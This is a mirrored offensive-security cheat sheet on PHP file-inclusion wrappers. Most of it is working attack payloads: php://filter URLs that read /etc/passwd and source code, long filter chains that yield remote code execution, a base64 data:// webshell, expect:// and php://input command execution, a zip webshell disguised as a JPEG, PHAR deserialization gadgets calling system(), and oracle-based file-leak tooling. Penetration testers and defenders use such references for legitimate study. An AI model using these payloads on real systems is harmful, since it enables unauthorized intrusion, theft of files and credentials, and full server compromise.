daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

wrappers.md (20342B)


      1 ---
      2 title: "Inclusion Using Wrappers"
      3 topic: "File Inclusion"
      4 topicSlug: "file-inclusion"
      5 sourcePath: "File Inclusion/Wrappers.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/File%20Inclusion/Wrappers.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Inclusion Using Wrappers
     12 
     13 A wrapper in the context of file inclusion vulnerabilities refers to the protocol or method used to access or include a file. Wrappers are often used in PHP or other server-side languages to extend how file inclusion functions, enabling the use of protocols like HTTP, FTP, and others in addition to the local filesystem.
     14 
     15 ## Summary
     16 
     17 - [Wrapper php://filter](#wrapper-phpfilter)
     18 - [Wrapper data://](#wrapper-data)
     19 - [Wrapper expect://](#wrapper-expect)
     20 - [Wrapper input://](#wrapper-input)
     21 - [Wrapper zip://](#wrapper-zip)
     22 - [Wrapper phar://](#wrapper-phar)
     23     - [PHAR Archive Structure](#phar-archive-structure)
     24     - [PHAR Deserialization](#phar-deserialization)
     25 - [Wrapper convert.iconv:// and dechunk://](#wrapper-converticonv-and-dechunk)
     26     - [Leak file content from error-based oracle](#leak-file-content-from-error-based-oracle)
     27     - [Leak file content inside a custom format output](#leak-file-content-inside-a-custom-format-output)
     28 - [References](#references)
     29 
     30 ## Wrapper php://filter
     31 
     32 The part "`php://filter`" is case insensitive
     33 
     34 | Filter                                                       | Description                                  |
     35 | ------------------------------------------------------------ | -------------------------------------------- |
     36 | `php://filter/read=string.rot13/resource=index.php`          | Display index.php as rot13                   |
     37 | `php://filter/convert.iconv.utf-8.utf-16/resource=index.php` | Encode index.php from utf8 to utf16          |
     38 | `php://filter/convert.base64-encode/resource=index.php`      | Display index.php as a base64 encoded string |
     39 
     40 ```powershell
     41 http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
     42 http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
     43 http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
     44 http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
     45 ```
     46 
     47 Wrappers can be chained with a compression wrapper for large files.
     48 
     49 ```powershell
     50 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
     51 ```
     52 
     53 NOTE: Wrappers can be chained multiple times using `|` or `/`:
     54 
     55 - Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s`
     56 - deflate then `base64encode` (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php`
     57 
     58 ```powershell
     59 ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page 
     60 curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
     61 ```
     62 
     63 Also there is a way to turn the `php://filter` into a full RCE.
     64 
     65 - [synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator) - A CLI to generate PHP filters chain
     66 
     67   ```powershell
     68   $ python3 php_filter_chain_generator.py --chain '<?php phpinfo();?>'
     69   [+] The following gadget chain will generate the following code : <?php phpinfo();?> (base64 value: PD9waHAgcGhwaW5mbygpOz8+)
     70   php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.UCS-2.UTF8|convert.iconv.L6.UTF8|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
     71   ```
     72 
     73 - [LFI2RCE.py](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/File%20Inclusion/Files/LFI2RCE.py) to generate a custom payload.
     74 
     75   ```powershell
     76   # vulnerable file: index.php
     77   # vulnerable parameter: file
     78   # executed command: id
     79   # executed PHP code: <?=`$_GET[0]`;;?>
     80   curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"
     81   ```
     82 
     83 ## Wrapper data://
     84 
     85 The payload encoded in base64 is "`<?php system($_GET['cmd']);echo 'Shell done !'; ?>`".
     86 
     87 ```powershell
     88 http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
     89 ```
     90 
     91 Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
     92 
     93 ## Wrapper expect://
     94 
     95 When used in PHP or a similar application, it may allow an attacker to specify commands to execute in the system's shell, as the `expect://` wrapper can invoke shell commands as part of its input.
     96 
     97 ```powershell
     98 http://example.com/index.php?page=expect://id
     99 http://example.com/index.php?page=expect://ls
    100 ```
    101 
    102 ## Wrapper input://
    103 
    104 Specify your payload in the POST parameters, this can be done with a simple `curl` command.
    105 
    106 ```powershell
    107 curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v
    108 ```
    109 
    110 Alternatively, Kadimus has a module to automate this attack.
    111 
    112 ```powershell
    113 ./kadimus -u "https://example.com/index.php?page=php://input%00"  -C '<?php echo shell_exec("id"); ?>' -T input
    114 ```
    115 
    116 ## Wrapper zip://
    117 
    118 - Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
    119 - Zip the file
    120 
    121   ```python
    122   zip payload.zip payload.php;
    123   mv payload.zip shell.jpg;
    124   rm payload.php
    125   ```
    126 
    127 - Upload the archive and access the file using the wrappers:
    128 
    129   ```ps1
    130   http://example.com/index.php?page=zip://shell.jpg%23payload.php
    131   ```
    132 
    133 ## Wrapper phar://
    134 
    135 ### PHAR archive structure
    136 
    137 PHAR files work like ZIP files, when you can use the `phar://` to access files stored inside them.
    138 
    139 - Create a phar archive containing a backdoor file: `php --define phar.readonly=0 archive.php`
    140 
    141   ```php
    142   <?php
    143     $phar = new Phar('archive.phar');
    144     $phar->startBuffering();
    145     $phar->addFromString('test.txt', '<?php phpinfo(); ?>');
    146     $phar->setStub('<?php __HALT_COMPILER(); ?>');
    147     $phar->stopBuffering();
    148   ?>
    149   ```
    150 
    151 - Use the `phar://` wrapper: `curl http://127.0.0.1:8001/?page=phar:///var/www/html/archive.phar/test.txt`
    152 
    153 ### PHAR deserialization
    154 
    155 :warning: This technique doesn't work on PHP 8+, the deserialization has been removed.
    156 
    157 If a file operation is now performed on our existing phar file via the `phar://` wrapper, then its serialized meta data is unserialized. This vulnerability occurs in the following functions, including file_exists: `include`, `file_get_contents`, `file_put_contents`, `copy`, `file_exists`, `is_executable`, `is_file`, `is_dir`, `is_link`, `is_writable`, `fileperms`, `fileinode`, `filesize`, `fileowner`, `filegroup`, `fileatime`, `filemtime`, `filectime`, `filetype`, `getimagesize`, `exif_read_data`, `stat`, `lstat`, `touch`, `md5_file`, etc.
    158 
    159 This exploit requires at least one class with magic methods such as `__destruct()` or `__wakeup()`.
    160 Let's take this `AnyClass` class as example, which execute the parameter data.
    161 
    162 ```php
    163 class AnyClass {
    164     public $data = null;
    165     public function __construct($data) {
    166         $this->data = $data;
    167     }
    168     
    169     function __destruct() {
    170         system($this->data);
    171     }
    172 }
    173 
    174 ...
    175 echo file_exists($_GET['page']);
    176 ```
    177 
    178 We can craft a phar archive containing a serialized object in its meta-data.
    179 
    180 ```php
    181 // create new Phar
    182 $phar = new Phar('deser.phar');
    183 $phar->startBuffering();
    184 $phar->addFromString('test.txt', 'text');
    185 $phar->setStub('<?php __HALT_COMPILER(); ?>');
    186 
    187 // add object of any class as meta data
    188 class AnyClass {
    189     public $data = null;
    190     public function __construct($data) {
    191         $this->data = $data;
    192     }
    193     
    194     function __destruct() {
    195         system($this->data);
    196     }
    197 }
    198 $object = new AnyClass('whoami');
    199 $phar->setMetadata($object);
    200 $phar->stopBuffering();
    201 ```
    202 
    203 Finally call the phar wrapper: `curl http://127.0.0.1:8001/?page=phar:///var/www/html/deser.phar`
    204 
    205 NOTE: you can use the `$phar->setStub()` to add the magic bytes of JPG file: `\xff\xd8\xff`
    206 
    207 ```php
    208 $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    209 ```
    210 
    211 ## Wrapper convert.iconv:// and dechunk://
    212 
    213 ### Leak file content from error-based oracle
    214 
    215 - `convert.iconv://`: convert input into another folder (`convert.iconv.utf-16le.utf-8`)
    216 - `dechunk://`: if the string contains no newlines, it will wipe the entire string if and only if the string starts with A-Fa-f0-9
    217 
    218 The goal of this exploitation is to leak the content of a file, one character at a time, based on the [DownUnderCTF](https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py) writeup.
    219 
    220 **Requirements**:
    221 
    222 - Backend must not use `file_exists` or `is_file`.
    223 - Vulnerable parameter should be in a `POST` request.
    224     - You can't leak more than 135 characters in a GET request due to the size limit
    225 
    226 The exploit chain is based on PHP filters: `iconv` and `dechunk`:
    227 
    228 1. Use the `iconv` filter with an encoding increasing the data size exponentially to trigger a memory error.
    229 2. Use the `dechunk` filter to determine the first character of the file, based on the previous error.
    230 3. Use the `iconv` filter again with encodings having different bytes ordering to swap remaining characters with the first one.
    231 
    232 Exploit using [synacktiv/php_filter_chains_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit), the script will use either the `HTTP status code: 500` or the time as an error-based oracle to determine the character.
    233 
    234 ```ps1
    235 $ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0   
    236 [*] The following URL is targeted : http://127.0.0.1
    237 [*] The following local file is leaked : /test
    238 [*] Running POST requests
    239 [+] File /test leak is finished!
    240 ```
    241 
    242 ### Leak file content inside a custom format output
    243 
    244 - [ambionics/wrapwrap](https://github.com/ambionics/wrapwrap) - Generates a `php://filter` chain that adds a prefix and a suffix to the contents of a file.
    245 
    246 To obtain the contents of some file, we would like to have: `{"message":"<file contents>"}`.
    247 
    248 ```ps1
    249 ./wrapwrap.py /etc/passwd 'PREFIX' 'SUFFIX' 1000
    250 ./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000
    251 ./wrapwrap.py /etc/passwd '<root><name>' '</name></root>' 1000
    252 ```
    253 
    254 This can be used against vulnerable code like the following.
    255 
    256 ```php
    257 <?php
    258   $data = file_get_contents($_POST['url']);
    259   $data = json_decode($data);
    260   echo $data->message;
    261 ?>
    262 ```
    263 
    264 ### Leak file content using blind file read primitive
    265 
    266 - [ambionics/lightyear](https://github.com/ambionics/lightyear)
    267 
    268 ```ps1
    269 code remote.py # edit Remote.oracle
    270 ./lightyear.py test # test that your implementation works
    271 ./lightyear.py /etc/passwd # dump a file!
    272 ```
    273 
    274 ## References
    275 
    276 - [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - December 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
    277 - [Iconv, set the charset to RCE: exploiting the libc to hack the php engine (part 1) - Charles Fol - May 27, 2024](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)
    278 - [Introducing lightyear: a new way to dump PHP files - Charles Fol - November 4, 2024](https://web.archive.org/web/20250809094219/https://www.ambionics.io/blog/lightyear-file-dump)
    279 - [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - December 11, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
    280 - [It's A PHP Unserialization Vulnerability Jim But Not As We Know It - Sam Thomas - August 10, 2018](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
    281 - [New PHP Exploitation Technique - Dr. Johannes Dahse - August 14, 2018](https://web.archive.org/web/20180817103621/https://blog.ripstech.com/2018/new-php-exploitation-technique/)
    282 - [OffensiveCon24 - Charles Fol- Iconv, Set the Charset to RCE - June 14, 2024](https://youtu.be/dqKFHjcK9hM)
    283 - [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - March 21, 2023](https://web.archive.org/web/20260228090126/https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
    284 - [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - October 18, 2022](https://web.archive.org/web/20260212042712/https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
    285 - [Solving "includer's revenge" from hxp CTF 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)